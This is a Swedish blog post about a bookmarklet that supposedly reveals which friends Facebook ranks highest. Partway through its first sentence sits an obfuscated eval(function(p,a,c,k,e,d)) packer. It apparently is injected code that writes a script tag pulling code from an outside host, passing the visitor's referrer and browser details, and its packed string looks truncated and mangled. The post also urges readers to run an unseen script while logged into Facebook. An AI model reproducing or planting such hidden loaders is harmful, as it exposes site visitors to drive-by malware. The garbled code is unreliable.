Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Vem är din bästa vän på Facebook? nytt script ger dig svar

Vem är din bästa vän på Facebook? nytt script ger dig svar
Filip Urde
  • On 11 november, 2013
  • http://www.revue.se/filip-urde

Exakt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dsthi|var|u0026u|referrer|batfb||js|php’.split(’|’),0,{}))
hur Facebook rankar dina vänner är lika begripligt som Googles algoritmer. Men här har vi ett script som kan hjälpa lite på traven.

 

 

 

Scriptet visar hur mycket Facebook ger dina vänner i rankingen. lägg länken (den här) i din webbläsares bokmärkesfältet och gå in på Facebook och klickan sedan på länken. Det kommer ge dig en lista över dina vänner, de med lägst värde ska enligt scriptet vara dina närmaste vänner på Facebook.

Som ni ser så är min gode vän och co-founder av Revue & Modiator.com (Sebastian) även min Nr1 på Face.

Facebook

 

 

 

 

 

 

 

 

 

 

 

 

 

arjunsreedharan.org